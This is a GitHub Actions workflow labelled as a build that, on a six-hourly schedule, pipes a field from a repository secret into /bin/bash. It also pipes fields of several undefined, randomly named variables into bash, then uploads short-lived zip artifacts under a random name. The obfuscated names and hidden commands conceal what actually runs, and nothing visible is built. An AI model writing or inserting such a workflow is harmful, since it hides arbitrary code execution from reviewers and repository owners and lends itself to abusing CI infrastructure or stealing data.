name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '56 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          jl189: ${{ secrets.jl189 }}
        run: |
          printf '%s' "$jl189" | jq -r .v586 | /bin/bash
          echo $smdyx5 | jq -r .igj8 | /bin/bash
          printf '%s' "$fky250" | jq -r .kpk626 | /bin/bash
          echo $svp4 | jq -r .uoxyp26 | /bin/bash
          printf '%s' "$x86" | jq -r .x0 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: Oecyidux
          path: "*.zip"
          retention-days: 1
